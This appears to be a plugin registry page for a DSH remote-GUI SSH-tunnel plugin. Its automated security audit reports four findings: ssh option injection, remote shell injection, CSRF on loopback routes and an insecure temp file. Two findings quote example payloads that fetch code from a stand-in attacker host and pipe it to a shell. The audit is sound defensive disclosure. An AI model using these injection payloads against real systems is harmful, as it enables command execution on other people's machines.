What it doesAI
Embeds a remote DeepSeek Harness GUI inside the local DSH window over an SSH tunnel, with remote session listing and local/remote switching.
- Embeds remote DSH GUI in the local window over an SSH tunnel
- Lists remote sessions for quick access
- Switches between local and remote DSH sessions
Capability tags are AI-inferred or rule-extracted from the README (see badge) — vocabulary-limited, not install-verified. AI = inferred; README = literal keyword from the readme.

Verification & Compatibility
Grouped by plugin version: each card lists the dsh versions actually tested against that artifact version and their install verdicts (L5 wins). Untested combinations are omitted — absence means untested, never assumed compatible. L1–L3 are a plugin-level static archive (independent of the dsh version — the same verdict on every dsh row): they sit in each row's level grid next to L4/L5, marked "static", while their evidence is stored once per plugin inside that row's "checks & evidence" instead of being duplicated per version.
External credentials (plugin-level): none detected
○ The author declares no dsh version requirement — install is not blocked by version.

Two automated layers, neither a manual review: a static scan (per-plugin rule checks) and a model-driven dynamic security audit that covers only the subset static-flagged at warn or above and never executes plugin code.
Static low, dynamic high — stricter wins → overall high.

show 4 audit findings
- highUnvalidated host alias is passed as an ssh argv element, allowing option injection (e.g. -oProxyCommand) and local command execution
lib/tunnel.js:38The alias is stored verbatim from POST /api/dsh-remote-gui/hosts (`alias: body.alias.trim()`, no validation that it is not an option) and then placed in ssh's argv. Because it appears before the other -o options, an alias such as `-oProxyCommand=curl attacker|sh` is parsed by OpenSSH as an option and the command runs locally with the DSH user's privileges; the same value is also reused in the ssh argv of lib/remote.js readLaunchToken. The only gate in front of that POST route is isLoopbackRequest (source address + Host header), which a request originating from the user's browser to 127.0.0.1:<
- mediumTool `cwd` (and headlessHome) is interpolated unescaped into the remote shell command, giving remote command injection
lib/tool.js:33The task text is safely shipped via stdin, but `args.cwd` (and `host.headlessHome` on the next line) are concatenated straight into the command string that ssh executes on the remote host. A cwd such as `"/tmp" ; curl attacker|sh ; "` breaks out of the quotes and runs arbitrary shell commands on the remote server, bypassing the headless agent's own tool permissions. The model supplies this argument, so remote session content that reaches the model can steer the value.
- mediumState-changing loopback routes have no Origin/CSRF check and intentionally skip the host's browser auth
lib/routes.js:81isLoopbackRequest only checks the socket address and the Host header. A cross-origin simple request (e.g. fetch with content-type text/plain) sent from any web page to http://127.0.0.1:<dshPort>/api/dsh-remote-gui/... satisfies both checks, and readJsonBody parses the body regardless of content type, so POST /session-prompt (which spends real money on the remote model), POST /tunnel and POST /hosts can be triggered without any user intent or token. The comment inside the plugin states these routes deliberately bypass the host's browser authentication, so this fence is the only barrier.
- lowPredictable world-readable temp file on the remote host (symlink clobber, task text retained)
lib/tool.js:34The remote command writes the task text to a fixed path with a plain `cat >` redirection: another user on the remote host can pre-create that path as a symlink and have the file overwritten with the task text (or read the 0644 file afterwards), and the content is never cleaned up after the run. Impact is limited to the remote account's own privileges, so it is a hardening gap rather than a demonstrated escalation.
Not malicious, but host.alias reaches ssh argv unchecked (option injection → local command execution) and tool cwd is shell-injected on the remote host.
Rule: the dynamic audit can only raise risk, never lower it (raise-only, never an exemption); a wrong raise is withdrawn by human review and the tier falls back to the static verdict. Overall verdict = the stricter of the two layers.
Disclaimer: the static scan and the dynamic security audit are both automated analysis, not a security guarantee. Always review what you install.
